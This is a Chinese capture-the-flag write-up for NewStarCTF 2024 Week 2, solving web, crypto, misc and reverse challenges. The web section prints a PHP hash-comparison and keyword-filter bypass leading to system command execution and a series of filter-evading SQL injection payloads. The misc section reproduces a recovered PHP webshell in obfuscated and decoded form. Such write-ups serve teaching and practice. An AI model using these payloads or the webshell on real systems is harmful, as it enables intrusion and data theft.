2024-NewStarCTF-WEEK2

Web

你能在一秒内打出八句英文吗

逻辑就是获取页面上的8句英文,打开浏览器自动提交,让GPT写了个脚本,得到flag

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.Chrome()
driver.get('http://eci-2ze34et4ylwxq2gontnc.cloudeci1.ichunqiu.com/start')  
sentences = driver.find_element(By.ID, 'text').text.split('. ')

input_text = '. '.join(sentences)
input_box = driver.find_element(By.ID, 'user-input')
input_box.clear()
input_box.send_keys(input_text)

submit_button = driver.find_element(By.ID, 'submit-btn')
submit_button.click()

WebDriverWait(driver, 10).until(EC.url_changes(driver.current_url))

flag值:flag{f0a355dc-3b02-46da-befb-c3f839b4ff8c}

遗失的拉链

扫目录得到www.zip文件,访问下载得到源码,看到pizwww.php文件

<?php
  error_reporting(0);
//for fun
if(isset($_GET['new'])&&isset($_POST['star'])){
  if(sha1($_GET['new'])===md5($_POST['star'])&&$_GET['new']!==$_POST['star']){
    //欸 为啥sha1和md5相等呢
    $cmd = $_POST['cmd'];
    if (preg_match("/cat|flag/i", $cmd)) {
      die("u can not do this ");
    }
    echo eval($cmd);
  }else{
    echo "Wrong";

  } 
}

使用数组绕过md5强比较,通配符绕过关键字绕过,得到flag

pizwww.php?new[]=1

star[]=2&cmd=system('more /f*');

flag值:flag{fbb54d68-32a1-4b84-b5e8-016e91724912}

谢谢皮蛋 plus

尝试sqlmap无果后开始手测

测试发现是双引号闭合,然后手动bypass发现过滤了空格和and

有回显直接用union select联合注入,使用/**/绕过空格,and基本没咋用,不用管,得到flag

-1"/**/UNION/**/SELECT/**/1,database()#

-1"/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="ctf"#

-1"/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="Fl4g"/**/or/**/table_schema="ctf"#

-1"/**/union/**/select/**/1,group_concat(id,value)/**/from/**/ctf.Fl4g#

flag: flag{584638f3-4dbc-4fbc-9a36-8737eed0936b}

复读机

测试发现是标准的SSTI,直接使用fenjing工具一把梭,得到flag

flag值:flag{374a4c88-9a79-4ad2-b16d-6554691fbb3d}

Crypto

这是几次方? 疑惑!

主要考点就是区分异或符号和幂符号,并且搞清楚运算符的优先级

加号的优先级高于异或符号,所以想要得到p很简单,只要把hint和e+10086异或就好了

hint = p^e + 10086

之后就是基础的RSA,脚本如下

from Crypto.Util.number import *

c = 36513006092776816463005807690891878445084897511693065366878424579653926750135820835708001956534802873403195178517427725389634058598049226914694122804888321427912070308432512908833529417531492965615348806470164107231108504308584954154513331333004804817854315094324454847081460199485733298227480134551273155762
n = 124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102569745482135768148755333759957370341658601268473878114399708702841974488367343570414404038862892863275173656133199924484523427712604601606674219929087411261
hint = 12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531673390
e = 65537

p = hint ^ 10086 + e
q = n // p
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)

print(long_to_bytes(m))

# flag{yihuo_yuan_lai_xian_ji_suan_liang_bian_de2333}

flag值:flag{yihuo_yuan_lai_xian_ji_suan_liang_bian_de2333}

Since you konw something

一道异或题目,但是key不知道,告诉了key极其小,可以爆破,脚本如下

from pwn import xor
from Crypto.Util.number import long_to_bytes

c = 218950457292639210021937048771508243745941011391746420225459726647571
flag = long_to_bytes(c)

def brute_force_key(flag):
    for key_length in range(1, 4):
        for i in range(256 ** key_length):
            key = long_to_bytes(i).rjust(key_length, b'\x00')
            plaintext = xor(flag, key)
            if plaintext.startswith(b'flag{') and plaintext.endswith(b'}'):
                print(f"找到密钥: {key}")
                print(f"解密后的明文: {plaintext.decode('utf-8')}")
                return key

brute_force_key(flag)

# 找到密钥: b'ns'
# 解密后的明文: flag{Y0u_kn0w_th3_X0r_b3tt3r}

flag值:flag{Y0u_kn0w_th3_X0r_b3tt3r}

Just one and more than two

因为p是素数,第一段中p代替了原来的n的位置,也就是模数,所以它的欧拉是p-1

N分解成了三个素数,它的模数是三个数分别减一再相乘

from Crypto.Util.number import *

p=11867061353246233251584761575576071264056514705066766922825303434965272105673287382545586304271607224747442087588050625742380204503331976589883604074235133
q=11873178589368883675890917699819207736397010385081364225879431054112944129299850257938753554259645705535337054802699202512825107090843889676443867510412393
r=12897499208983423232868869100223973634537663127759671894357936868650239679942565058234189535395732577137079689110541612150759420022709417457551292448732371
c1=8705739659634329013157482960027934795454950884941966136315983526808527784650002967954059125075894300750418062742140200130188545338806355927273170470295451
c2=1004454248332792626131205259568148422136121342421144637194771487691844257449866491626726822289975189661332527496380578001514976911349965774838476334431923162269315555654716024616432373992288127966016197043606785386738961886826177232627159894038652924267065612922880048963182518107479487219900530746076603182269336917003411508524223257315597473638623530380492690984112891827897831400759409394315311767776323920195436460284244090970865474530727893555217020636612445
e = 65537

phi_p = p - 1
d1 = inverse(e, phi_p)
m1 = pow(c1, d1, p)

N = p * q * r
phi_N = (p - 1) * (q - 1) * (r - 1)
d2 = inverse(e, phi_N)
m2 = pow(c2, d2, N)

print(long_to_bytes(m1) + long_to_bytes(m2))

# flag{Y0u_re4lly_kn0w_Euler_4nd_N3xt_Eu1er_is_Y0u!}

flag值:flag{Y0u_re4lly_kn0w_Euler_4nd_N3xt_Eu1er_is_Y0u!}

Misc

wireshark_checkin

http过滤,看到flag.txt,tcp追踪流直接看到flag

flag值:flag{ez_traffic_analyze_isn't_it}

wireshark_secret

http有一张图片,提取出来

flag值:flag{you_are_gooddddd}

字里行间的秘密

一个txt文本,0宽解密,得到key,it_is_k3y

用密码解开word文档,全选改变文本颜色,得到flag

flag值:flag{you_h4ve_4nyth1n9}

Herta's Study

过滤http,可以看到先是上传了一个horse.php的木马文件,然后来执行命令

得到木马文件,按照加密流程将它转化为正常的木马

<?php
    $payload=$_GET['payload'];
    $payload=shell_exec($payload);
    $bbb=create_function(
        base64_decode('J'.str_rot13('T').'5z'),   
        base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRp
        Kz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQo
        gICAgfQ0KfQ0KcmV0dXJuICRuczs==')   
    );  
    echo $bbb($payload);

?>

<?php

  $payload=$_GET['payload'];
$payload = shell_exec($payload);

$bbb = create_function(
  '$ns',
  '
    $ns = base64_encode($ns);
    for ($i = 0; $i < strlen($ns); $i += 1) {
        if ($i % 2 == 1) {
            $ns[$i] = str_rot13($ns[$i]);
        }
    }
    return $ns;
    '
);

echo $bbb($payload);
?>

找到打印flag.txt命令和命令经过木马处理后的结果

知道了木马的加密流程,我们写一个逆向还原加密后字符串的脚本

<?php
function reverse_encode($encoded_string) {
    // 逆向 ROT13 解码
    for ($i = 0; $i < strlen($encoded_string); $i += 1) {
        if ($i % 2 == 1) {
            $encoded_string[$i] = str_rot13($encoded_string[$i]);
        }
    }

    // 对解码后的字符串进行 base64 解码
    $decoded_string = base64_decode($encoded_string);

    return $decoded_string;
}

$encoded_output = "ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==";
$original_input = reverse_encode($encoded_output);

echo $original_input;

# flag{sH3_i4_S0_6eAut1fuL.} 

flag值:flag{sH3_i4_S0_6eAut1fuL.}

热心助人的小明同学

工具直接一把梭

flag值:flag{ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh}

Reverse

UPX

die查壳,发现有upx壳,脱壳

看主函数发现是先将flagRC4加密,然后循环判断御给定的字符是否相等

双击产看加密流程和key

加密后的值与data比较,查看data存储的字节,这里需要将ciphertext中的整数值转换为无符号字节

至此,所有条件都有了,写脚本如下

def init_sbox(key):
    key_length = len(key)
    sbox = list(range(256))
    j = 0
    for i in range(256):
        j = (j + sbox[i] + key[i % key_length]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
    return sbox

def rc4_decrypt(ciphertext, key):
    sbox = init_sbox(key)
    i = 0
    j = 0
    plaintext = []
    for byte in ciphertext:
        i = (i + 1) % 256
        j = (j + sbox[i]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
        k = sbox[(sbox[i] + sbox[j]) % 256]
        plaintext.append(byte ^ k)
    return bytes(plaintext)

def main():
    key = b"NewStar"
    ciphertext = bytes([
        0xC4, 0x60, 0xAF, 0xB9, 0xE3, 0xFF, 0x2E, 0x9B, 0xF5, 0x10, 0x56, 0x51, 0x6E, 0xEE, 0x5F, 0x7D, 0x7D, 0x6E, 0x2B, 0x9C, 0x75, 0xB5
    ])

    plaintext = rc4_decrypt(ciphertext, key)
    print("解密后的明文:", plaintext.decode('utf-8'))

if __name__ == "__main__":
    main()

# flag{Do_you_know_UPX?}

flag值:flag{Do_you_know_UPX?}

相关推荐
蜜獾云1 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld
H轨迹H8 小时前
#渗透测试 kioptix level 2靶机通关教程及提权
网络安全·渗透测试·oscp
AirDroid_qs10 小时前
Niushop开源商城(漏洞复现)
android·网络安全·开源
星竹12 小时前
upload-labs-master第21关超详细教程
网络安全
蜜獾云12 小时前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
Clockwiseee1 天前
php伪协议
windows·安全·web安全·网络安全
Lspecialnx_1 天前
文件解析漏洞中间件(iis和Apache)
网络安全·中间件
学习溢出1 天前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程